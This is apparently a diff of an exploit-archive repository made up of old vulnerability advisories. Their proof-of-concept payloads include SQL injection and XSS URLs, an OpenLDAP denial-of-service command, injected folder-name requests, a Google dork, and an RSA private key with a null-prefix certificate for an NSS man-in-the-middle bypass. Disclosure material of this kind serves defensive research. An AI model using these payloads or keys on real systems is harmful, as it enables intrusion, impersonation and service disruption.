<input value="Upload Files" class="buttons" id="uploadFilesButton" onclick="uploadFilesButtonClick()" type="button">
|
||||
<input value="Create Folder" class="buttons" id="createFolderButton" onclick="createFolderButtonClick()" type="button">
|
||||
<input disabled="" value="Rename" class="buttons" id="renameButton" onclick="renameButtonClick()" type="button">
|
||||
<input disabled="" value="Delete" class="buttons" id="deleteButton" onclick="deleteButtonClick()" type="button">
|
||||
<input value="Select All" class="buttons" id="selectAllButton" onclick="selectAllButtonClick()" type="button">
|
||||
<input value="Deselect All" class="buttons" id="unselectAllButton" onclick="unselectAllButtonClick()" type="button">
|
||||
</fieldset>
|
||||
<div class="separator"></div>
|
||||
<div class="fileListTableContainer">
|
||||
<table class="table" id="fileListTable"><tbody><tr id="fileListTable_-1" class="header">
|
||||
<td id="fileListTable_-1_0" class="field">Name</td><td id="fileListTable_-1_1" class="field">Ext</td><td id="fileListTable_-1_2" class="field">Size</td></tr>
|
||||
<tr index="0" id="fileListTable_0" class="row"><td index="0" field="name" id="fileListTable_0_0" class="cell">>-[CODE EXECUTION VULNERABILITY!]></td>
|
||||
<td index="1" field="ext" id="fileListTable_0_1" class="cell">dir</td><td index="2" field="size" id="fileListTable_0_2" class="cell"></td></tr>
|
||||
<tr index="1" id="fileListTable_1" class="row"><td index="0" field="name" id="fileListTable_1_0" class="cell">testfolder1</td><td index="1" field="ext"
|
||||
id="fileListTable_1_1" class="cell">dir</td><td index="2" field="size" id="fileListTable_1_2" class="cell"></td></tr><tr index="2" id="fileListTable_2"
|
||||
class="row"><td index="0" field="name" id="fileListTable_2_0" class="cell">testfolder2</td><td index="1" field="ext" id="fileListTable_2_1"
|
||||
class="cell">dir</td><td index="2" field="size" id="fileListTable_2_2" class="cell"></td></tr></tbody></table></div>
|
||||
|
||||
|
||||
--- PoC Session Logs [GET] ---
|
||||
Status: 200[OK]
|
||||
GET http://localhost:80/createdir?path=%2F%3E%22%3C-[CODE EXECUTION VULNERABILITY!];%3E Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[43] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:80]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Referer[http://localhost:80/index.html]
|
||||
Connection[keep-alive]
|
||||
Response Header:
|
||||
Connection[Keep-Alive]
|
||||
Content-Length[43]
|
||||
|
||||
|
||||
Status: 200[OK]
|
||||
GET http://localhost:80/-[CODE EXECUTION VULNERABILITY]; Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:80]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Referer[http://localhost:80/index.html]
|
||||
Connection[keep-alive]
|
||||
Response Header:
|
||||
Connection[Close]
|
||||
Date[Sun, 19 Oct 2014 16:22:46 GMT]
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patched by a secure restriction and parse of the create folder input field. Encode also the vulnerable name value in the
|
||||
index.html file to prevent application-side code execution attacks.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the code execution web vulnerability in the path value is estimated as critical. (CVSS 8.8)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
|
||||
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
|
||||
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
|
||||
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
|
||||
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
|
||||
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY RESEARCH TEAM
|
||||
DOMAIN: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
source: http://securityreason.com/securityalert/8003
|
||||
// source: http://securityreason.com/securityalert/8003
|
||||
|
||||
-----BEGIN PGP SIGNED MESSAGE-----
|
||||
Hash: SHA1
|
||||
|
|
|
@ -1,11 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/27778/info
|
||||
|
||||
OpenLDAP is prone to a remote denial-of-service vulnerability.
|
||||
|
||||
Attackers can exploit this issue to deny service to legitimate users.
|
||||
|
||||
OpenLDAP 2.3.39 is vulnerable to this issue; other versions may also be affected.
|
||||
|
||||
This issue is related to one described in BID 26245 (OpenLDAP Multiple Remote Denial of Service Vulnerabilities), identified by CVE-2007-6698.
|
||||
|
||||
ldapmodrdn -x -h :389 -D <dn> -w <pw> -e \noop ou=test,dc=my-domain,dc=com ou=test2
|
|
@ -1,155 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/35888/info
|
||||
|
||||
Mozilla Network Security Services (NSS) is prone to a security-bypass vulnerability because it fails to properly validate the domain name in a signed CA certificate, allowing attackers to substitute malicious SSL certificates for trusted ones.
|
||||
|
||||
The NSS library is used by a number of applications, including Mozilla Firefox, Thunderbird, and SeaMonkey.
|
||||
|
||||
Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks or impersonate trusted servers, which will aid in further attacks.
|
||||
|
||||
NOTE (August 6, 2009): This BID had included a similar issue in Fetchmail, but that issue is now documented in BID 35951 (Fetchmail NULL Character CA SSL Certificate Validation Security Bypass Vulnerability).
|
||||
|
||||
Private-Key: (1024 bit)
|
||||
modulus:
|
||||
00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
|
||||
5e:42:b6:28:09:75:2f:19:61:d9:ab:4d:ec:f3:44:
|
||||
c4:1c:01:95:6f:27:eb:70:07:98:4f:1e:05:d0:f3:
|
||||
6c:49:45:e6:de:48:7a:59:f0:c2:93:6a:37:9c:02:
|
||||
72:4f:bd:14:36:26:a1:70:97:d4:fe:4b:24:e8:cd:
|
||||
29:1e:61:1a:85:b0:6f:96:06:83:10:13:d6:89:9f:
|
||||
bd:07:67:f1:42:de:9b:63:67:8b:96:f9:06:ef:7c:
|
||||
93:4b:6a:f9:39:31:32:7f:98:59:ef:ce:91:be:05:
|
||||
ce:f0:82:33:d8:76:06:4c:9f
|
||||
publicExponent: 65537 (0x10001)
|
||||
privateExponent:
|
||||
00:8c:4f:3b:7c:ba:ee:bc:ea:ee:d6:58:7d:61:ff:
|
||||
3d:35:9e:21:3f:35:87:a9:80:67:59:e1:26:8e:09:
|
||||
6f:4b:1d:6f:4d:8b:11:7a:04:49:fc:d2:ef:50:dc:
|
||||
51:e0:ce:65:52:f2:6f:8d:cc:bd:86:15:90:8a:11:
|
||||
c5:d9:5e:ba:fc:2b:fc:e3:a0:cd:c8:f0:9a:05:76:
|
||||
06:82:07:a9:bd:14:cc:c7:7e:54:b9:32:5b:40:7a:
|
||||
35:0a:26:80:d7:30:98:d6:b7:71:d5:9d:f4:0d:f2:
|
||||
28:b5:a9:0c:2e:6d:78:19:86:a9:31:b0:a1:43:1c:
|
||||
57:2c:78:a9:42:b2:49:d8:71
|
||||
prime1:
|
||||
00:ec:07:79:1d:e2:50:14:77:af:99:18:1b:14:d4:
|
||||
0c:25:0c:20:26:0d:dd:c7:75:0e:08:d3:77:72:ce:
|
||||
2d:57:80:9d:18:bb:60:7b:b2:62:4e:21:a1:e6:84:
|
||||
96:91:31:15:cc:5b:89:5b:5a:83:07:96:51:e4:d4:
|
||||
e6:3a:40:99:03
|
||||
prime2:
|
||||
00:e0:d7:5a:07:0e:cc:a6:17:22:f8:ec:51:b1:7b:
|
||||
17:af:3a:87:7b:f1:e4:6d:40:48:28:d2:c0:9c:93:
|
||||
e0:f1:8f:79:07:8f:00:e0:49:1d:0e:8c:65:41:ba:
|
||||
c8:20:e2:ae:78:54:75:6b:f0:41:e5:d1:9c:2e:23:
|
||||
49:79:53:35:35
|
||||
exponent1:
|
||||
15:17:15:db:75:bd:72:16:bf:ba:0e:4d:5d:2f:15:
|
||||
66:ba:0e:a5:57:d7:d9:5a:bc:46:4d:9e:fe:c3:2d:
|
||||
8a:04:14:05:81:b8:bd:54:d3:33:e8:0d:6f:6b:a9:
|
||||
88:8f:ba:42:e8:6a:fd:9e:b8:d6:94:b7:fc:9a:89:
|
||||
77:eb:0d:c1
|
||||
exponent2:
|
||||
5c:5a:38:61:63:c3:cd:88:fd:55:6f:84:12:b9:73:
|
||||
be:06:f5:75:84:a3:05:f8:fc:6a:c0:3e:5b:52:26:
|
||||
78:32:2d:4d:5c:80:c8:9f:5f:6f:05:5d:e6:04:b9:
|
||||
85:40:76:d7:78:21:8f:07:6d:99:df:62:1e:55:62:
|
||||
2d:92:6e:ed
|
||||
coefficient:
|
||||
00:c5:62:ea:ee:85:5c:eb:e6:07:12:58:a5:63:5a:
|
||||
8f:e3:b3:df:c5:1e:cc:01:cd:87:d4:12:3f:45:8e:
|
||||
a9:4c:83:51:31:5a:e5:8d:11:a1:e3:84:b8:b4:e1:
|
||||
12:33:eb:2d:4c:4e:8c:49:e2:0d:50:aa:ca:38:e3:
|
||||
e6:c2:29:86:17
|
||||
Certificate Request:
|
||||
Data:
|
||||
Version: 0 (0x0)
|
||||
Subject: C=US, CN=*\x00thoughtcrime.noisebridge.net, ST=California, L=San Francisco, O=Noisebridge, OU=Moxie Marlinspike Fan Club
|
||||
Subject Public Key Info:
|
||||
Public Key Algorithm: rsaEncryption
|
||||
RSA Public Key: (1024 bit)
|
||||
Modulus (1024 bit):
|
||||
00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
|
||||
5e:42:b6:28:09:75:2f:19:61:d9:ab:4d:ec:f3:44:
|
||||
c4:1c:01:95:6f:27:eb:70:07:98:4f:1e:05:d0:f3:
|
||||
6c:49:45:e6:de:48:7a:59:f0:c2:93:6a:37:9c:02:
|
||||
72:4f:bd:14:36:26:a1:70:97:d4:fe:4b:24:e8:cd:
|
||||
29:1e:61:1a:85:b0:6f:96:06:83:10:13:d6:89:9f:
|
||||
bd:07:67:f1:42:de:9b:63:67:8b:96:f9:06:ef:7c:
|
||||
93:4b:6a:f9:39:31:32:7f:98:59:ef:ce:91:be:05:
|
||||
ce:f0:82:33:d8:76:06:4c:9f
|
||||
Exponent: 65537 (0x10001)
|
||||
Attributes:
|
||||
a0:00
|
||||
Signature Algorithm: md5WithRSAEncryption
|
||||
64:e6:b2:77:45:74:c3:dc:f6:3d:e7:73:7f:0f:fb:dd:d7:30:
|
||||
c3:0f:30:d5:52:2c:6b:41:ad:40:2b:4b:07:2a:de:80:69:d4:
|
||||
a7:0b:6f:ed:cc:62:e7:4d:e1:fc:1e:81:0d:94:b9:c8:9b:14:
|
||||
0a:10:d4:8e:f9:53:76:11:51:1d:c9:80:ca:15:e5:78:02:e1:
|
||||
d1:89:95:b5:4a:3f:e0:f7:f3:35:ad:1f:7d:85:5b:8c:f5:de:
|
||||
70:05:8f:4f:1d:cb:23:83:dd:63:b7:2f:1a:8c:a1:3c:67:d9:
|
||||
f9:fc:63:c0:dc:bb:72:56:13:f6:3d:db:8e:d5:dc:01:9a:20:
|
||||
a2:dc
|
||||
-----BEGIN RSA PRIVATE KEY-----
|
||||
MIICXQIBAAKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+tw
|
||||
B5hPHgXQ82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQ
|
||||
E9aJn70HZ/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQAB
|
||||
AoGBAIxPO3y67rzq7tZYfWH/PTWeIT81h6mAZ1nhJo4Jb0sdb02LEXoESfzS71Dc
|
||||
UeDOZVLyb43MvYYVkIoRxdleuvwr/OOgzcjwmgV2BoIHqb0UzMd+VLkyW0B6NQom
|
||||
gNcwmNa3cdWd9A3yKLWpDC5teBmGqTGwoUMcVyx4qUKySdhxAkEA7Ad5HeJQFHev
|
||||
mRgbFNQMJQwgJg3dx3UOCNN3cs4tV4CdGLtge7JiTiGh5oSWkTEVzFuJW1qDB5ZR
|
||||
5NTmOkCZAwJBAODXWgcOzKYXIvjsUbF7F686h3vx5G1ASCjSwJyT4PGPeQePAOBJ
|
||||
HQ6MZUG6yCDirnhUdWvwQeXRnC4jSXlTNTUCQBUXFdt1vXIWv7oOTV0vFWa6DqVX
|
||||
19lavEZNnv7DLYoEFAWBuL1U0zPoDW9rqYiPukLoav2euNaUt/yaiXfrDcECQFxa
|
||||
OGFjw82I/VVvhBK5c74G9XWEowX4/GrAPltSJngyLU1cgMifX28FXeYEuYVAdtd4
|
||||
IY8HbZnfYh5VYi2Sbu0CQQDFYuruhVzr5gcSWKVjWo/js9/FHswBzYfUEj9FjqlM
|
||||
g1ExWuWNEaHjhLi04RIz6y1MToxJ4g1Qqso44+bCKYYX
|
||||
-----END RSA PRIVATE KEY-----
|
||||
-----BEGIN CERTIFICATE REQUEST-----
|
||||
MIIB3jCCAUcCADCBnjELMAkGA1UEBhMCVVMxJzAlBgNVBAMUHioAdGhvdWdodGNy
|
||||
aW1lLm5vaXNlYnJpZGdlLm5ldDETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UE
|
||||
BxMNU2FuIEZyYW5jaXNjbzEUMBIGA1UEChMLTm9pc2VicmlkZ2UxIzAhBgNVBAsT
|
||||
Gk1veGllIE1hcmxpbnNwaWtlIEZhbiBDbHViMIGfMA0GCSqGSIb3DQEBAQUAA4GN
|
||||
ADCBiQKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+twB5hP
|
||||
HgXQ82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQE9aJ
|
||||
n70HZ/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQABoAAw
|
||||
DQYJKoZIhvcNAQEEBQADgYEAZOayd0V0w9z2Pedzfw/73dcwww8w1VIsa0GtQCtL
|
||||
ByregGnUpwtv7cxi503h/B6BDZS5yJsUChDUjvlTdhFRHcmAyhXleALh0YmVtUo/
|
||||
4PfzNa0ffYVbjPXecAWPTx3LI4PdY7cvGoyhPGfZ+fxjwNy7clYT9j3bjtXcAZog
|
||||
otw=
|
||||
-----END CERTIFICATE REQUEST-----
|
||||
-----BEGIN CERTIFICATE-----
|
||||
MIIGTjCCBbegAwIBAgIDExefMA0GCSqGSIb3DQEBBQUAMIIBEjELMAkGA1UEBhMC
|
||||
RVMxEjAQBgNVBAgTCUJhcmNlbG9uYTESMBAGA1UEBxMJQmFyY2Vsb25hMSkwJwYD
|
||||
VQQKEyBJUFMgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgcy5sLjEuMCwGA1UEChQl
|
||||
Z2VuZXJhbEBpcHNjYS5jb20gQy5JLkYuICBCLUI2MjIxMDY5NTEuMCwGA1UECxMl
|
||||
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEuMCwGA1UEAxMl
|
||||
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEgMB4GCSqGSIb3
|
||||
DQEJARYRZ2VuZXJhbEBpcHNjYS5jb20wHhcNMDkwNzMwMDcxNDQyWhcNMTEwNzMw
|
||||
MDcxNDQyWjCBnjELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAU
|
||||
BgNVBAcTDVNhbiBGcmFuY2lzY28xFDASBgNVBAoTC05vaXNlYnJpZGdlMSMwIQYD
|
||||
VQQLExpNb3hpZSBNYXJsaW5zcGlrZSBGYW4gQ2x1YjEnMCUGA1UEAxQeKgB0aG91
|
||||
Z2h0Y3JpbWUubm9pc2VicmlkZ2UubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB
|
||||
iQKBgQDPTRdCAI0MQZUxjEAwvF5CtigJdS8ZYdmrTezzRMQcAZVvJ+twB5hPHgXQ
|
||||
82xJRebeSHpZ8MKTajecAnJPvRQ2JqFwl9T+SyTozSkeYRqFsG+WBoMQE9aJn70H
|
||||
Z/FC3ptjZ4uW+QbvfJNLavk5MTJ/mFnvzpG+Bc7wgjPYdgZMnwIDAQABo4IDITCC
|
||||
Ax0wCQYDVR0TBAIwADARBglghkgBhvhCAQEEBAMCBkAwCwYDVR0PBAQDAgP4MBMG
|
||||
A1UdJQQMMAoGCCsGAQUFBwMBMB0GA1UdDgQWBBStfpIwBXE+eXWUWtE3s5JqXon2
|
||||
TzAfBgNVHSMEGDAWgBQOB2DUOckbW12QeyPI0jSdSppGOTAJBgNVHREEAjAAMBwG
|
||||
A1UdEgQVMBOBEWdlbmVyYWxAaXBzY2EuY29tMHIGCWCGSAGG+EIBDQRlFmNPcmdh
|
||||
bml6YXRpb24gSW5mb3JtYXRpb24gTk9UIFZBTElEQVRFRC4gQ0xBU0VBMSBTZXJ2
|
||||
ZXIgQ2VydGlmaWNhdGUgaXNzdWVkIGJ5IGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS8w
|
||||
LwYJYIZIAYb4QgECBCIWIGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIv
|
||||
MEMGCWCGSAGG+EIBBAQ2FjRodHRwczovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAy
|
||||
L2lwc2NhMjAwMkNMQVNFQTEuY3JsMEYGCWCGSAGG+EIBAwQ5FjdodHRwczovL3d3
|
||||
dy5pcHNjYS5jb20vaXBzY2EyMDAyL3Jldm9jYXRpb25DTEFTRUExLmh0bWw/MEMG
|
||||
CWCGSAGG+EIBBwQ2FjRodHRwczovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAyL3Jl
|
||||
bmV3YWxDTEFTRUExLmh0bWw/MEEGCWCGSAGG+EIBCAQ0FjJodHRwczovL3d3dy5p
|
||||
cHNjYS5jb20vaXBzY2EyMDAyL3BvbGljeUNMQVNFQTEuaHRtbDCBgwYDVR0fBHww
|
||||
ejA5oDegNYYzaHR0cDovL3d3dy5pcHNjYS5jb20vaXBzY2EyMDAyL2lwc2NhMjAw
|
||||
MkNMQVNFQTEuY3JsMD2gO6A5hjdodHRwOi8vd3d3YmFjay5pcHNjYS5jb20vaXBz
|
||||
Y2EyMDAyL2lwc2NhMjAwMkNMQVNFQTEuY3JsMDIGCCsGAQUFBwEBBCYwJDAiBggr
|
||||
BgEFBQcwAYYWaHR0cDovL29jc3AuaXBzY2EuY29tLzANBgkqhkiG9w0BAQUFAAOB
|
||||
gQAjzXaLBu+/+RP0vQ6WjW/Pxgm4WQYhecqZ2+7ZFbsUCMJPQ8XE2uv+rIteGnRF
|
||||
Zr3hYb+dVlfUnethjPhazZW+/hU4FePqmlbTtmMe+zMLThiScyC8y3EW4L4BZYcp
|
||||
p1drPlZIj2RmSgPQ99oToUk5O6t+LMg1N14ajr9TpM8yNQ==
|
||||
-----END CERTIFICATE-----
|
|
@ -1,12 +0,0 @@
|
|||
source: http://www.securityfocus.com/bid/36958/info
|
||||
|
||||
|
||||
CUPS is prone to a cross-site scripting vulnerability because the software fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
NOTE: This vulnerability was originally reported in BID 36956 (Apple Mac OS X 2009-006 Multiple Security Vulnerabilities), but has been given its own record to better document it.
|
||||
|
||||
This issue affects versions prior to CUPS 1.4.2.
|
||||
|
||||
http://www.example.com/admin/?kerberos=onmouseover=alert
|
|
@ -1,42 +0,0 @@
|
|||
1 ########################################## 1
|
||||
0 I'm Sid3^effects member from Inj3ct0r Team 1
|
||||
1 ########################################## 0
|
||||
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
|
||||
|
||||
Name : I-net Multi User Email Script SQLi Vulnerability
|
||||
Date : june, 27 2010
|
||||
Critical Level : HIGH
|
||||
Vendor Url : http://www.i-netsolution.com/
|
||||
Google Dork: inurl:/jobsearchengine/
|
||||
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
|
||||
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
|
||||
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
|
||||
#######################################################################################################
|
||||
|
||||
Description:
|
||||
i-Net Multi User Email Script to start your own Email Website like GMAIL, YAHOO Mail, Hot Mail made in CGI/PERL, tested over Linux
|
||||
|
||||
Servers. Features of i-Net Multi User Email Script, Advanced Spam Filtering, RBL Blacklisting, Completely MIME compatible, Contact List
|
||||
|
||||
Members Filter Proof, Multiple Skins, Limit Users Outgoing Mail (Depending on User Level) Sort Inbox With Several Criteria, Fully
|
||||
|
||||
customizable via HTML templates, Mod_Perl Compatible, New Mail Sounds, WYSIWYG Mail Interface, Multiple Tiered Premium Accounts, Premium
|
||||
|
||||
Accounts using Paypal & Subscriptions, SMTP or Send mail, Fully functional calendar and scheduler, Unlimited User Folders, Folder Filtering
|
||||
|
||||
(Incoming mail directed to specific folders), Email notifications of new mail, MySQL backend, Backup, Powerful Admin Panel, Ban IP, Advanced
|
||||
|
||||
User Editing, Account Suspensions, User Address Book, i-Net Talk and many more features.
|
||||
|
||||
#######################################################################################################
|
||||
|
||||
Xploit: SQLi VUlnerability
|
||||
|
||||
|
||||
The I-net Multi User Email Script has SQli vuln :D
|
||||
|
||||
DEMO URL : http://xxxx.com/php121_editname.php?uid=[sqli]
|
||||
|
||||
###############################################################################################################
|
||||
# 0day no more
|
||||
# Sid3^effects
|
|
@ -1,3 +1,15 @@
|
|||
Attackers use readily available LDAP commands to exploit this issue. The following command demonstrates this issue:
|
||||
Attackers use readily available LDAP commands to exploit this issue.
|
||||
|
||||
ldapmodrdn -x -h :389 -D <dn> -w <pw> -e \noop ou=test,dc=my-domain,dc=com ou=test2
|
||||
|
||||
|
||||
source: http://www.securityfocus.com/bid/27778/info
|
||||
|
||||
OpenLDAP is prone to a remote denial-of-service vulnerability.
|
||||
|
||||
Attackers can exploit this issue to deny service to legitimate users.
|
||||
|
||||
OpenLDAP 2.3.39 is vulnerable to this issue; other versions may also be affected.
|
||||
|
||||
This issue is related to one described in BID 26245 (OpenLDAP Multiple Remote Denial of Service Vulnerabilities), identified by CVE-2007-6698.
|
||||
|
||||
ldapmodrdn -x -h :389 -D <dn> -w <pw> -e \noop ou=test,dc=my-domain,dc=com ou=test2
|
|
@ -2,4 +2,18 @@ Attackers can exploit this issue by enticing an unsuspecting victim into followi
|
|||
|
||||
The following example URI is available:
|
||||
|
||||
http://www.example.com/admin/?kerberos=onmouseover=alert
|
||||
http://www.example.com/admin/?kerberos=onmouseover=alert
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
source: http://www.securityfocus.com/bid/36958/info
|
||||
|
||||
CUPS is prone to a cross-site scripting vulnerability because the software fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
NOTE: This vulnerability was originally reported in BID 36956 (Apple Mac OS X 2009-006 Multiple Security Vulnerabilities), but has been given its own record to better document it.
|
||||
|
||||
This issue affects versions prior to CUPS 1.4.2.
|
|
@ -1,3 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/35888/info
|
||||
|
||||
Mozilla Network Security Services (NSS) is prone to a security-bypass vulnerability because it fails to properly validate the domain name in a signed CA certificate, allowing attackers to substitute malicious SSL certificates for trusted ones.
|
||||
|
||||
The NSS library is used by a number of applications, including Mozilla Firefox, Thunderbird, and SeaMonkey.
|
||||
|
||||
Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks or impersonate trusted servers, which will aid in further attacks.
|
||||
|
||||
NOTE (August 6, 2009): This BID had included a similar issue in Fetchmail, but that issue is now documented in BID 35951 (Fetchmail NULL Character CA SSL Certificate Validation Security Bypass Vulnerability).
|
||||
|
||||
Private-Key: (1024 bit)
|
||||
modulus:
|
||||
00:cf:4d:17:42:00:8d:0c:41:95:31:8c:40:30:bc:
|
||||
|
@ -142,4 +152,4 @@ BgEFBQcwAYYWaHR0cDovL29jc3AuaXBzY2EuY29tLzANBgkqhkiG9w0BAQUFAAOB
|
|||
gQAjzXaLBu+/+RP0vQ6WjW/Pxgm4WQYhecqZ2+7ZFbsUCMJPQ8XE2uv+rIteGnRF
|
||||
Zr3hYb+dVlfUnethjPhazZW+/hU4FePqmlbTtmMe+zMLThiScyC8y3EW4L4BZYcp
|
||||
p1drPlZIj2RmSgPQ99oToUk5O6t+LMg1N14ajr9TpM8yNQ==
|
||||
-----END CERTIFICATE-----
|
||||
-----END CERTIFICATE-----
|
||||
|
|
|
@ -1,6 +1,8 @@
|
|||
source: http://www.securityfocus.com/bid/530/exploit
|
||||
/*
|
||||
source: http://www.securityfocus.com/bid/530/info
|
||||
|
||||
The SGI Array Services provide a mechanism to simplify administering and managing an array of clustered systems. The arrayd(1m) program is part of the array_services(5) and is known as the array services daemon. The default configuration for authorization makes clustered systems vulnerable to remote root compromises. The array services are installed on Irix systems by default from the Irix applications CD. All versions of Unicos post 9.0.0 are vulnerable.
|
||||
*/
|
||||
|
||||
/*## copyright LAST STAGE OF DELIRIUM aug 1999 poland *://lsd-pl.net/ #*/
|
||||
/*## arrayd #*/
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
source: http://www.securityfocus.com/bid/5829/exploit
|
||||
source: http://www.securityfocus.com/bid/5829/info
|
||||
|
||||
Monkey HTTP server is prone to cross site scripting vulnerabilities.
|
||||
|
||||
|
|
|
@ -1 +1,7 @@
|
|||
http://www.example.com/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
|
||||
source: http://www.securityfocus.com/bid/34383/info
|
||||
|
||||
The Apache 'mod_perl' module is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
http://www.example.com/perl-status/APR::SockAddr::port/%22%3E%3Cscript%3Ealert(1)%3C/script%3E
|
|
@ -1,34 +0,0 @@
|
|||
[~]######################################### InformatioN #############################################[~]
|
||||
|
||||
[~] Title : Joomla Component com_actions SQL Injection Vulnerability
|
||||
[~] Author : DevilZ TM By D3v1l
|
||||
[~] Homepage : http://www.DEVILZTM.com
|
||||
[~] Email : Expl0it@DevilZTM.Com
|
||||
[~] Contact : D3v1l.blackhat@yahoo.com
|
||||
|
||||
[~]######################################### ExploiT #############################################[~]
|
||||
|
||||
[~] Vulnerable File :
|
||||
|
||||
http://127.0.0.1/index.php?option=com_actions&actionid=[SQL]
|
||||
|
||||
[~] ExploiT :
|
||||
|
||||
-1 UNION SELECT 1,2,3,4,5,6,7--
|
||||
|
||||
[~] Example :
|
||||
|
||||
http://127.0.0.1/index.php?option=com_actions&actionid=-1 UNION SELECT 1,2,3,4,5,6,7--
|
||||
|
||||
|
||||
[~]######################################### ThankS To ... ############################################[~]
|
||||
|
||||
[~] Special Thanks To My Best FriendS :
|
||||
|
||||
